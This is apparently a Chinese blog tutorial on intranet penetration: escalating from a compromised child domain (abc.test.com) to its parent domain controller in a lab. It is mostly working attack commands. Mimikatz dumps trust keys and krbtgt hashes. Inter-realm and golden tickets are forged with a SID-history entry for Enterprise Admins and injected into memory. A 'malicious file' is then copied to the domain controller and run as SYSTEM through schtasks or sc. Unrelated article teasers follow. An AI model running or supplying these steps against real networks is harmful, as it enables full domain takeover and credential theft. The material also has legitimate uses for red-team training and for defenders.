news 2026/7/3 4:01:17

内网渗透-域控安全和跨域攻击-获取目标域方法总结

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网渗透-域控安全和跨域攻击-获取目标域方法总结

利用域信任密钥获取目标域

实验环境

IP地址

所属域

域中地位

机器名

当前登录用户

192.168.113.152

test.com

根域的域控

DC

hack\administrator

192.168.113.153

abc.test.com

子域的域控

DC2

abc\administrator

192.168.113.156

abc.test.com

子域中的机器

Abc-losy

abc\losy

当前已经控制abc.hack.com域,其中包括 DC2机器和ABC-LOSY机器

实验步骤

当前losy用户无法访问DC.test.COM

shell dir \\dc.test.com\c$

在控制的dc2下面使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥

mimikatz.exe "privilege::debug" "lsadump::lsa /patch /user:TEST$" "lsadump::trust /patch" exit

mimikatz privilege::debug

mimikatz lsadump::lsa /patch /user:TEST$

mimikatz lsadump::trust /patch

Current domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)

Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)

rc4_hmac_nt277a4340abf41c1a580dc99c730f20d8

在普通的域内用户(losy)中创建创建高权限票据

mimikatz.exe "kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi" exit

à

mimikatz kerberos::golden /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /rc4:277a4340abf41c1a580dc99c730f20d8/user:administrator/service:krbtgt /target:test.com /ticket:administrator.kirbi

上传asktgs.exe和kirbikator.exe工具

asktgs.exe伪造票据,kirbikator.exe注入票据

创建CIFS服务的票据进行复制文件的操作

shell asktgs.exe administrator.kirbi CIFS/DC.test.com

将票据注入内存

shell kirbikator.exe lsa CIFS.DC.test.com.kirbi

访问域控

shell dir \\dc.test.com\c$

服务恶意文件,如果复制失败,请注入host服务票据。

shell copy 123.exe \\dc.test.com\c$

伪造host服务,进行创建计划任务

shell asktgs.exe administrator.kirbi host/DC.test.com

将票据注入内存

shell kirbikator.exe lsa host.DC.test.com.kirbi

上传恶意文件并创建计划任务

shell copy 123.exe \\dc.test.com\C$\

shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f

执行计划任务

shell schtasks /run /s dc.test.com /i /tn "test123"

用sc也可以:

shell copy 123.exe \\dc.test.com\C$\

shell sc \\dc.test.com create test binpath= "cmd.exe /c c:\123.exe"

shell sc \\dc.test.com start test

shell sc \\dc.test.com delete test

提示

如果做着做着,就遇到拒绝访问的情况

说明票据的时间戳失效了,要shell klist purge后重新做

利用krbtgt哈希值获取目标域

实验环境

IP地址

所属域

域中地位

机器名

当前登录用户

192.168.113.152

test.com

根域的域控

DC

hack\administrator

192.168.113.153

abc.test.com

子域的域控

DC2

abc\administrator

192.168.113.156

abc.test.com

子域中的机器

Abc-losy

abc\losy

当前已经控制abc.hack.com域,其中包括 DC2机器和ABC-LOSY机器

实验步骤

在dc2里面获取Krbtgt散列

mimikatz lsadump::lsa /patch /user:krbtgt

NTLM : f778d436c7b4ccecb735d596638c547a

在dc2里面获取关键信息

mimikatz lsadump::trust /patch

Current domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)

Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)

在losy用户下构造并注入黄金票据

mimikatz Kerberos::golden /user:administrator /domain:当前域名/sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列/ptt

à

mimikatz Kerberos::golden /user:administrator /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /krbtgt:f778d436c7b4ccecb735d596638c547a/ptt

访问目标域

shell dir \\dc.test.com\c$

上传恶意文件并创建计划任务

shell copy 123.exe \\dc.test.com\C$\

shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f

执行计划任务

shell schtasks /run /s dc.test.com /i /tn "test123"

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/3 3:59:56

5分钟深度解析:DLSS Swapper终极指南与专业应用实践

5分钟深度解析:DLSS Swapper终极指南与专业应用实践 【免费下载链接】dlss-swapper 项目地址: https://gitcode.com/GitHub_Trending/dl/dlss-swapper DLSS版本管理、游戏画质优化、性能提升工具、DLSS Swapper技术原理、自动版本替换 在当今游戏图形技术飞…

作者头像 李华
网站建设 2026/6/27 11:27:18

Abode BR安装包

本软件资源仅可用于个人技术研究、学习交流与非盈利性实验场景。严禁将本程序及其衍生内容用于各类商业经营、盈利项目、对公业务等商业行为。若有商业化使用需求,请联系著作权方获取正式授权并采购正版授权版本,严格遵守软件著作权相关法律法规。分享文…

作者头像 李华
网站建设 2026/6/27 11:18:38

N_m3u8DL-RE深度解析:现代流媒体下载器的架构设计与实战模式

N_m3u8DL-RE深度解析:现代流媒体下载器的架构设计与实战模式 【免费下载链接】N_m3u8DL-RE Cross-Platform, modern and powerful stream downloader for MPD/M3U8/ISM. English/简体中文/繁體中文. 项目地址: https://gitcode.com/GitHub_Trending/nm3/N_m3u8DL…

作者头像 李华
网站建设 2026/6/27 11:17:27

2026 外呼合规收紧:从静态黑名单到平台化动态风控的技术演进

外呼这两年"线路越来越难做",表面看是政策收紧,底层其实是一次技术架构的迁移:风控正从"静态名单 人工调线"往"语音链路 动态模型 闭环"走。本文从工程视角拆这条演进线,以及落地要解决的几个问…

作者头像 李华
网站建设 2026/6/27 11:16:17

六月AI旗舰连发四轮,模型更新比手机系统还勤快,我已经跟不上了

模型更新比手机系统还勤快,我已经跟不上了 上个月我刚换了一个新模型用,花了两个晚上调到自己舒服的工作流里。昨天看到消息说,下周又要出新版了。 前后间隔——三周。 三周。我连它的脾气都还没完全摸清楚,继任者已经进内测了。六…

作者头像 李华